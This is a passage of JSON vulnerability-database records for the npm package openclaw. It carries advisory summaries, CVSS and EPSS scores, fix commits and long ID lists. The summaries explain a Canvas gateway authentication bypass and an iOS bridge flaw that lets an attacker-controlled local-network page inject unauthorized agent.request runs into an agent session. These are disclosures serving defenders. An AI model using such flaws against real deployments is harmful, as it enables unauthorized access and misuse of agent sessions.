"vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23" } ], "aliases": [ "CVE-2026-35618", "GHSA-cg6c-q2hx-69h7" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v1bp-hw9a-yffz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91274?format=api", "vulnerability_id": "VCID-v91b-1nmx-ckcx", "summary": "OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n## Summary\nBefore `v2026.3.23`, Canvas and A2UI loopback requests could bypass Canvas bearer-or-capability authentication because `authorizeCanvasRequest(...)` treated `isLocalDirectRequest(...)` as an unconditional allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `src/gateway/server/http-auth.ts`. `authorizeCanvasRequest(...)` returned `{ ok: true }` for local-direct requests before checking bearer authentication or an active node canvas capability, which meant unauthenticated loopback Canvas HTTP and WebSocket requests could succeed.\n\n## Fix Commit(s)\n- `d5dc6b6573ae489bc7e5651090f4767b93537c9e` — `fix(gateway): require auth for canvas routes`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server/http-auth.ts` no longer contains the local-direct early return in `authorizeCanvasRequest(...)`.\n- `src/gateway/server.canvas-auth.test.ts` adds the regression test `denies canvas HTTP/WS on loopback without bearer or capability by default`.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35634", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10198", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10235", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10214", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35634" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway" }, { "reference_url": "https://github.com/advisories/GHSA-6mqc-jqh6-x8fc", "reference_id": "GHSA-6mqc-jqh6-x8fc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6mqc-jqh6-x8fc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api", "purl": "pkg:npm/openclaw@2026.3.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23" } ], "aliases": [ "CVE-2026-35634", "GHSA-6mqc-jqh6-x8fc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v91b-1nmx-ckcx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89840?format=api", "vulnerability_id": "VCID-v9cd-65tf-p3f8", "summary": "OpenClaw: iOS A2UI bridge trusted generic local-network pages for agent.request dispatch\n## Summary\nBefore OpenClaw 2026.4.2, the iOS A2UI bridge treated generic local-network pages as trusted bridge origins. A page loaded from a local-network or tailnet host could trigger agent.request dispatch without the stricter trusted-canvas origin check.\n\n## Impact\nA loaded attacker-controlled page could inject unauthorized non-owner agent.request runs into the active iOS node session, polluting session state and consuming budget. The demonstrated impact did not include owner-only actions or arbitrary host execution.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.1\n- Patched versions: >= 2026.4.2\n- Latest published npm version: 2026.4.1\n\n## Fix Commit(s)\n49d08382a90f71dabe2877b3f6729ad85f808d57 — restrict A2UI action dispatch to trusted canvas URLs\n\n## Release Process Note\nThe fix is present on main and is staged for OpenClaw 2026.4.2. Publish this advisory after the 2026.4.2 npm release is live.\n\nThanks [@nexrin](https://github.com/nexrin) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41398", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00689", "published_at": "2026-06-06T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00688", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41398" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41398", "reference_id": "CVE-2026-41398", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41398" }, { "reference_url": "https://github.com/advisories/GHSA-4p4f-fc8q-84m3", "reference_id": "GHSA-4p4f-fc8q-84m3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4p4f-fc8q-84m3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": 